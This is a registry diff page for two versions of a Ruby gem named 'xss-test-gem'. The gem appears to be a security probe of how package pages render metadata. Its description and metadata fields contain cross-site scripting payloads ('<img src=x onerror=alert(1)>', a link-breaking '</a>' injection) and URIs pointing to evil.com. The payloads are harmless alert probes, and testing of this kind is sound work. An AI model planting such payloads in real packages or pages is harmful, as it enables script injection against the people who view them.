xss-test-gem 0.3.0 → 0.3.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of xss-test-gem might be problematic. Click here for more details.

Files changed (2) hide show
  1. checksums.yaml +2 -2
  2. metadata +7 -8
checksums.yaml CHANGED
@@ -1,4 +1,4 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: de031cb5f3ed799c62aa6cbe843d50a6957c56094d04e9c8f3916c1baaee028b
4
- data.tar.gz: 4b01a9fdcd1e2981862a82a2aacc3edad052ccda77a1aa6cec50ac3b6910a021
3
+ metadata.gz: 432e5a9783cdaa09e212f1a6088088ee5fad254f1845de13493d06ae23e3ba06
4
+ data.tar.gz: 1da0a2ee5e01559fb13c5cf4384456999d6cf3e671130b7a6ebda5e75564d259
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: xss-test-gem
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.3.0
4
+ version: 0.3.1
5
5
  platform: ruby
6
6
  authors:
7
7
  - Testing Buffalo
@@ -9,19 +9,18 @@ email: testingbuffalo@apexblack.org
9
9
  homepage: https://rubygems.org/gems/xss-test-gem
10
10
  licenses:
11
11
  - MIT
12
- summary: Link text injection test
12
+ summary: Metadata injection test
13
13
  description: |
14
- == Link Text Injection
15
-
16
- {</a><img src=x onerror=alert(1)><a>}[https://evil.com]
17
- {<img src=x onerror=alert(1)>}[https://evil.com]
18
-
14
+ == Metadata Injection Test
19
15
  required_ruby_version: !ruby/object:Gem::Requirement
20
16
  requirements:
21
17
  - - ">="
22
18
  - !ruby/object:Gem::Version
23
19
  version: '0'
24
- metadata: {}
20
+ metadata:
21
+ injected_key: "<img src=x onerror=alert(1)>"
22
+ source_code_uri: "https://evil.com"
23
+ changelog_uri: "https://evil.com/changelog"
25
24
  files:
26
25
  - lib/xssgem.rb
27
26
  require_paths: